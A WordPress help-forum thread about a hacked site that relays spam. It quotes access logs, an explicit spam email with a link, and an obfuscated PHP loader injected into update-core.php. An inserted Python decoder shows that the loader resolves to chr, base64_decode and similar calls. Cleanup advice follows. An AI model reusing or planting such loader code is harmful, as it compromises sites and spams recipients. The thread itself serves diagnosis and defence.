WP site used to send spam, can't find source

Hi,

I have a weird problem. I have a site that is being used as a spam relay and sending spam. I have about 20 sites on one server but this one site appears to be the cause.

I have command line access and can see the logs. I have disabled postfix to stop the spam from being sent. The spam messages are queuing up in the system and can be seen with the ‘mailq’ command.

Here is the list of plugins installed.

All In One WP Security 4.0.3 http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin

BMI BMR calculator 1.3 http://wordpress.org/plugins/bmi-bmr-calculator/

Breadcrumb NavXT 5.3.1 http://mtekk.us/code/breadcrumb-navxt/

CloudFlare 1.3.19 http://www.cloudflare.com/wiki/CloudFlareWordPressPlugin

Admin Columns 2.4.8 http://www.admincolumns.com

Disable Comments 1.3.2 http://wordpress.org/extend/plugins/disable-comments/

Gravity Forms 1.8.19 http://www.gravityforms.com

Jetpack by WordPress.com 3.8.2 http://jetpack.me

WPBakery Visual Composer 4.5.2 http://vc.wpbakery.com

Simple Custom CSS 3.2 http://johnregan3.github.io/simple-custom-css

TemplatesNext ToolKit 1.1.4

UpdraftPlus – Backup/Restore 1.11.20 https://updraftplus.com

Yoast SEO 3.0.7 https://yoast.com/wordpress/plugins/seo/#utm_source=wpadmin&utm_medium=plugin&utm_campaign=wpseoplugin

Also, here are a few lines of http-access that are not from my address.

198.71.230.7 - - [03/Jan/2016:22:21:54 +0000] "POST /wp-admin/update-core.php HTTP/1.1" 200 92
93.125.99.4 - - [03/Jan/2016:22:22:41 +0000] "POST /wp-admin/update-core.php HTTP/1.1" 200 92
50.62.208.100 - - [03/Jan/2016:22:24:46 +0000] "POST /wp-admin/update-core.php HTTP/1.1" 200 92

Here is one of the spam emails in the postfix queue:

rewrite_context=local
[email protected]
To: [email protected]
Subject: 1 New InstaCheat Alert
X-PHP-Originating-Script: 48:update-core.php(1) : eval()'d code(1) : eval()'d code
Date: Sun, 3 Jan 2016 22:33:06 +0000
From: Wilma Fitzgerald <[email protected]>
Message-ID: <[email protected]>
X-Priority: 3
X-Mailer: PHPMailer 5.2.9 (https://github.com/PHPMailer/PHPMailer/)
MIME-Version: 1.0
Content-Type: multipart/alternative;
 boundary="b1_10dd4c7c740c265c75725085ae91aa87"
Content-Transfer-Encoding: 8bit

--b1_10dd4c7c740c265c75725085ae91aa87
Content-Type: text/plain; charset=us-ascii

I'm horny as f#ck and looking for something tonight! want to meetup?
i'm not into commitment. i just want a hard f*ck
[ http://moeller-it-service.de/dirs.php?a=40&3=81YhFdRxWsVt7cza ]
my profile
see u soon

--b1_10dd4c7c740c265c75725085ae91aa87
Content-Type: text/html; charset=us-ascii

<html>
<body>
I'm horny as f#ck and looking for something tonight! want to meetup?
i'm not into commitment. i just want a hard f*ck
my profile
see u soon
</html>
</body>

--b1_10dd4c7c740c265c75725085ae91aa87--
[email protected]

UPDATE: I looked at the update-core.php file and it has a GLOBALS defined in it, whereas no other update-core.php file has it. Could this be the error? How did it get in here?

$GLOBALS['z4c0'];global$z4c0;$z4c0=$GLOBALS;$z4c0['u7a1']="x2bx38x69xax7ex71x39x4dx3ex4ex76x31x2ax48x47x65x26x66x68x29x54x77x4fx20x4cx6bx6ax4bx46x56x24x45x36x2cx32x63x44x51x50x40x5cx72x9x2ex3fx6fx5ax42x7ax3ax21x6ex5ex59x58x55x43x6dx4ax5fx70x78x23x62x53x30x60x41x49x28x61x6cx75x74x22x34x3cx7dx2dx33x79x64x52x25x3dx35x7cx27x5dx57xdx2fx73x37x67x5bx7bx3b";$z4c0[$z4c0['u7a1'][57].$z4c0['u7a1'][81].$z4c0['u7a1'][75].$z4c0['u7a1'][15]]=$z4c0['u7a1'][35].$z4c0['u7a1'][18].$z4c0['u7a1'][41];$z4c0[$z4c0['u7a1'][15].$z4c0['u7a1'][32].$z4c0['u7a1'][1].$z4c0['u7a1'][70].$z4c0['u7a1'][93].$z4c0['u7a1'][34]]=$z4c0['u7a1'][45].$z4c0['u7a1'][41].$z4c0['u7a1'][81];$z4c0[$z4c0['u7a1'][92].$z4c0['u7a1'][11].$z4c0['u7a1'][93].$z4c0['u7a1'][35].$z4c0['u7a1'][79].$z4c0['u7a1'][6].$z4c0['u7a1'][81].$z4c0['u7a1'][35]]=$z4c0['u7a1'][92].$z4c0['u7a1'][73].$z4c0['u7a1'][41].$z4c0['u7a1'][71].$z4c0['u7a1'][15].$z4c0['u7a1'][51];$z4c0[$z4c0['u7a1'][26].$z4c0['u7a1'][17].$z4c0['u7a1'][11].$z4c0['u7a1'][79].$z4c0['u7a1'][35].$z4c0['u7a1'][63]]=$z4c0['u7a1'][2].$z4c0['u7a1'][51].$z4c0['u7a1'][2].$z4c0['u7a1'][59].$z4c0['u7a1'][92].$z4c0['u7a1'][15].$z4c0['u7a1'][73];$z4c0[$z4c0['u7a1'][51].$z4c0['u7a1'][65].$z4c0['u7a1'][63].$z4c0['u7a1'][15].$z4c0['u7a1'][70].$z4c0['u7a1'][6].$z4c0['u7a1'][85].$z4c0['u7a1'][65]]=$z4c0['u7a1'][92].$z4c0['u7a1'][15].$z4c0['u7a1'][41].$z4c0['u7a1'][2].$z4c0['u7a1'][70].$z4c0['u7a1'][71].$z4c0['u7a1'][2].$z4c0['u7a1'][48].$z4c0['u7a1'][15];$z4c0[$z4c0['u7a1'][61].$z4c0['u7a1'][85].$z4c0['u7a1'][63].$z4c0['u7a1'][79].$z4c0['u7a1'][15].$z4c0['u7a1'][15].$z4c0['u7a1'][11].$z4c0['u7a1'][35]]=$z4c0['u7a1'][60].$z4c0['u7a1'][18].$z4c0['u7a1'][60].$z4c0['u7a1'][10].$z4c0['u7a1'][15].$z4c0['u7a1'][41].$z4c0['u7a1'][92].$z4c0['u7a1'][2].$z4c0['u7a1'][45].$z4c0['u7a1'][51];$z4c0[$z4c0['u7a1'][92].$z4c0['u7a1'][17].$z4c0['u7a1'][35].$z4c0['u7a1'][17].$z4c0['u7a1'][79].$z4c0['u7a1'][75].$z4c0['u7a1'][34].$z4c0['u7a1'][79]]=$z4c0['u7a1'][72].$z4c0['u7a1'][51].$z4c0['u7a1'][92].$z4c0
['u7a1'][15].$z4c0['u7a1'][41].$z4c0['u7a1'][2].$z4c0['u7a1'][70].$z4c0['u7a1'][71].$z4c0['u7a1'][2].$z4c0['u7a1'][48].$z4c0['u7a1'][15];$z4c0[$z4c0['u7a1'][63].$z4c0['u7a1'][32].$z4c0['u7a1'][65].$z4c0['u7a1'][1].$z4c0['u7a1'][79].$z4c0['u7a1'][85].$z4c0['u7a1'][35].$z4c0['u7a1'][17]]=$z4c0['u7a1'][63].$z4c0['u7a1'][70].$z4c0['u7a1'][92].$z4c0['u7a1'][15].$z4c0['u7a1'][32].$z4c0['u7a1'][75].$z4c0['u7a1'][59].$z4c0['u7a1'][81].$z4c0['u7a1'][15].$z4c0['u7a1'][35].$z4c0['u7a1'][45].$z4c0['u7a1'][81].$z4c0['u7a1'][15];$z4c0[$z4c0['u7a1'][57].$z4c0['u7a1'][65].$z4c0['u7a1'][35].$z4c0['u7a1'][75]]=$z4c0['u7a1'][92].$z4c0['u7a1'][15].$z4c0['u7a1'][73].$z4c0['u7a1'][59].$z4c0['u7a1'][73].$z4c0['u7a1'][2].$z4c0['u7a1'][57].$z4c0['u7a1'][15].$z4c0['u7a1'][59].$z4c0['u7a1'][71].$z4c0['u7a1'][2].$z4c0['u7a1'][57].$z4c0['u7a1'][2].$z4c0['u7a1'][73];$z4c0[$z4c0['u7a1'][21].$z4c0['u7a1'][79].$z4c0['u7a1'][85].$z4c0['u7a1'][65].$z4c0['u7a1'][79].$z4c0['u7a1'][34].$z4c0['u7a1'][34].$z4c0['u7a1'][15].$z4c0['u7a1'][32]]=$z4c0['u7a1'][15].$z4c0['u7a1'][75].$z4c0['u7a1'][34].$z4c0['u7a1'][1];$z4c0[$z4c0['u7a1'][35].$z4c0['u7a1'][93].$z4c0['u7a1'][32].$z4c0['u7a1'][6].$z4c0['u7a1'][85]]=$z4c0['u7a1'][72].$z4c0['u7a1'][81].$z4c0['u7a1'][79].$z4c0['u7a1'][63].$z4c0['u7a1'][81].$z4c0['u7a1'][15].$z4c0['u7a1'][93];$z4c0[$z4c0['u7a1'][48].$z4c0['u7a1'][79].$z4c0['u7a1'][32].$z4c0['u7a1'][75].$z4c0['u7a1'][65].$z4c0
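As an added analysis example (not code from the original post), here is a Python decoder for the `$GLOBALS` lookup-table obfuscation in the quoted update-core.php fragment: it rebuilds the character table from the `\xNN` string and resolves each index-concatenation back to the PHP function name it hides. It assumes only the fragment quoted above, copied from the post; the page's extraction dropped the backslash from every escape, and the decoder tolerates that.

```python
import re

# First statements of the injected code quoted in the post, copied as-is.
# The page lost the backslash of every \xNN escape ("x2bx38..."), so
# HEX_RE below accepts both "\x2b" and "x2b".
FRAGMENT = r"""
$GLOBALS['z4c0'];global$z4c0;$z4c0=$GLOBALS;
$z4c0['u7a1']="x2bx38x69xax7ex71x39x4dx3ex4ex76x31x2ax48x47x65x26x66x68x29x54x77x4fx20x4cx6bx6ax4bx46x56x24x45x36x2cx32x63x44x51x50x40x5cx72x9x2ex3fx6fx5ax42x7ax3ax21x6ex5ex59x58x55x43x6dx4ax5fx70x78x23x62x53x30x60x41x49x28x61x6cx75x74x22x34x3cx7dx2dx33x79x64x52x25x3dx35x7cx27x5dx57xdx2fx73x37x67x5bx7bx3b";
$z4c0[$z4c0['u7a1'][57].$z4c0['u7a1'][81].$z4c0['u7a1'][75].$z4c0['u7a1'][15]]=$z4c0['u7a1'][35].$z4c0['u7a1'][18].$z4c0['u7a1'][41];
$z4c0[$z4c0['u7a1'][92].$z4c0['u7a1'][11].$z4c0['u7a1'][93].$z4c0['u7a1'][35].$z4c0['u7a1'][79].$z4c0['u7a1'][6].$z4c0['u7a1'][81].$z4c0['u7a1'][35]]=$z4c0['u7a1'][92].$z4c0['u7a1'][73].$z4c0['u7a1'][41].$z4c0['u7a1'][71].$z4c0['u7a1'][15].$z4c0['u7a1'][51];
$z4c0[$z4c0['u7a1'][26].$z4c0['u7a1'][17].$z4c0['u7a1'][11].$z4c0['u7a1'][79].$z4c0['u7a1'][35].$z4c0['u7a1'][63]]=$z4c0['u7a1'][2].$z4c0['u7a1'][51].$z4c0['u7a1'][2].$z4c0['u7a1'][59].$z4c0['u7a1'][92].$z4c0['u7a1'][15].$z4c0['u7a1'][73];
$z4c0[$z4c0['u7a1'][63].$z4c0['u7a1'][32].$z4c0['u7a1'][65].$z4c0['u7a1'][1].$z4c0['u7a1'][79].$z4c0['u7a1'][85].$z4c0['u7a1'][35].$z4c0['u7a1'][17]]=$z4c0['u7a1'][63].$z4c0['u7a1'][70].$z4c0['u7a1'][92].$z4c0['u7a1'][15].$z4c0['u7a1'][32].$z4c0['u7a1'][75].$z4c0['u7a1'][59].$z4c0['u7a1'][81].$z4c0['u7a1'][15].$z4c0['u7a1'][35].$z4c0['u7a1'][45].$z4c0['u7a1'][81].$z4c0['u7a1'][15];
$z4c0[$z4c0['u7a1'][57].$z4c0['u7a1'][65].$z4c0['u7a1'][35].$z4c0['u7a1'][75]]=$z4c0['u7a1'][92].$z4c0['u7a1'][15].$z4c0['u7a1'][73].$z4c0['u7a1'][59].$z4c0['u7a1'][73].$z4c0['u7a1'][2].$z4c0['u7a1'][57].$z4c0['u7a1'][15].$z4c0['u7a1'][59].$z4c0['u7a1'][71].$z4c0['u7a1'][2].$z4c0['u7a1'][57].$z4c0['u7a1'][2].$z4c0['u7a1'][73];
"""

HEX_RE = re.compile(r"\\?x([0-9a-fA-F]{1,2})")
# $var['key']="<hex escapes>";  -> the character lookup table
TABLE_RE = re.compile(r"""\$(\w+)\['(\w+)'\]="((?:\\?x[0-9a-fA-F]{1,2})+)";""")
# $var['key'][n]  -> one character taken from that table
INDEX_RE = re.compile(r"\$(\w+)\['(\w+)'\]\[(\d+)\]")
# $var[<key expr>]=<value expr>;  -> one obfuscated assignment
STMT_RE = re.compile(r"\$(\w+)\[(.+?)\]=(.+?);")

def load_tables(src):
    """Map (variable, key) to the decoded lookup string."""
    return {(var, key): "".join(chr(int(h, 16)) for h in HEX_RE.findall(raw))
            for var, key, raw in TABLE_RE.findall(src)}

def decode_expr(expr, tables):
    """Resolve a '.'-concatenation of table lookups; None if there are none."""
    refs = INDEX_RE.findall(expr)
    if not refs:
        return None
    return "".join(tables[(var, key)][int(i)] for var, key, i in refs)

def decode_fragment(src):
    """Return {obfuscated slot name: hidden PHP function name}."""
    tables = load_tables(src)
    resolved = {}
    for _var, key_expr, val_expr in STMT_RE.findall(src):
        name, value = decode_expr(key_expr, tables), decode_expr(val_expr, tables)
        if name is not None and value is not None:
            resolved[name] = value
    return resolved

if __name__ == "__main__":
    for slot, func in decode_fragment(FRAGMENT).items():
        print(f"$z4c0['{slot}'] -> {func}")
```

The quoted statements resolve to chr, strlen, ini_set, base64_decode and set_time_limit, the usual toolkit of a loader that decodes and runs a payload, which matches the "eval()'d code" origin in the queued message's X-PHP-Originating-Script header.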

  Tyler Postle (Recruit)

    Hey jpforte,

    That code definitely looks suspicious, and if it’s not in the current version of the update-core.php file, then it’s safe to say that it’s not needed, as custom changes shouldn’t be made to the core files.

    Here is a guide on how to reinstall your WP version after a hack: http://www.inmotionhosting.com/support/website/wordpress/reinstall-wordpress-after-a-hack

    That should make sure your files are clean. Make sure you do a scan as well, you can actually contact your web host and they’ll often do this for you. It’s always safe to do one yourself too.

    Could this be the error? How did it get in here?

    I’m not very knowledgeable when it comes to hacking; however, it’s possible someone got a hold of your FTP info and uploaded it that way or really any type of access to your files. So I would recommend changing your cPanel, FTP, and wp-admin passwords.

    Hope that helps! Let us know if you’re still seeing issues after re-installing and cleaning up your install.

    Cheers,

    Tyler